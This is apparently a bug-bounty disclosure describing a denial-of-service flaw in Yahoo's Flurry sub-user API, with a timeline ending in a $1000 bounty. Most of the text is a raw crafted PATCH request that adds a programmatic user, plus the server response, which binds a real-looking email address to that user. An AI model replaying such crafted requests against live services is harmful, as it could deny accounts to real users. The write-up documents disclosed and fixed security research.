DoS attack in Yahoo: how I was able to deny new users from service

Sub-Users feature
  • Invite a sub-user with customized permissions
  • Create a programmatic user with API permissions
PATCH /pulse/v1/ HTTP/2
Host: ecto.flurry.com

[
  {
    "op": "add",
    "path": "user",
    "value": {
      "type": "user",
      "id": "5b1b8f87-9d79-4516-8576-f77e4411a46a",
      "attributes": {
        "email": "354732_bd6adce9-2118-4fb9-a043-009f49968553@programmatic.flurry.com",
        "programmatic": "true"
      }
    }
  },
  {
    "op": "add",
    "path": "user/5b1b8f87-9d79-4516-8576-f77e4411a46a/memberships",
    "value": {
      "type": "membership",
      "id": "f3ca1d13-12d1-4b0c-8faa-fc14ffb499a3",
      "attributes": {
        "role": "NONE",
        "title": "*",
        "productRoles": {
          "Analytics": "VIEWER",
          "AppSpot": "VIEWER",
          "AdAnalytics": "NONE",
          "RawDataDownload": "DEV",
          "GDPRDataSubjectRights": "NONE"
        }
      },
      "relationships": {
        "company": {"data": [{"type": "company", "id": "354732"}]},
        "user": {"data": [{"type": "user", "id": "5b1b8f87-9d79-4516-8576-f77e4411a46a"}]}
      }
    }
  }
]

HTTP/2 200 OK

[
  {
    "data": {
      "type": "user",
      "id": "482035",
      "attributes": {
        "email": "mostafa@gmail.com",
        "firstName": null,
        "lastName": null,
        "programmatic": true
      },
      "relationships": {
        "memberships": {"data": [{"type": "membership", "id": "547510"}]}
      }
    }
  },
  {
    "data": {
      "type": "membership",
      "id": "547510",
      "attributes": {
        "creationDate": null,
        "limitAccess": false,
        "limitedAccessProjects": [],
        "primaryMembership": false,
        "productRoles": {
          "Analytics": "VIEWER",
          "AppSpot": "VIEWER",
          "AdAnalytics": "NONE",
          "RawDataDownload": "DEV",
          "GDPRDataSubjectRights": "NONE"
        },
        "role": "NONE",
        "title": "Cairo programmatic 90477"
      },
      "relationships": {
        "company": {"data": {"type": "company", "id": "354732"}},
        "user": {"data": {"type": "user", "id": "482035"}}
      }
    }
  }
]
  • December 17, 2019 — Bug reported
  • December 21, 2019 — Bug triaged
  • January 28, 2020 — Bug resolved
  • February 12, 2020 — Bounty rewarded: $1000

I’m a Penetration Tester, Bug Hunter @ HackerOne

Mostafa Mamdoh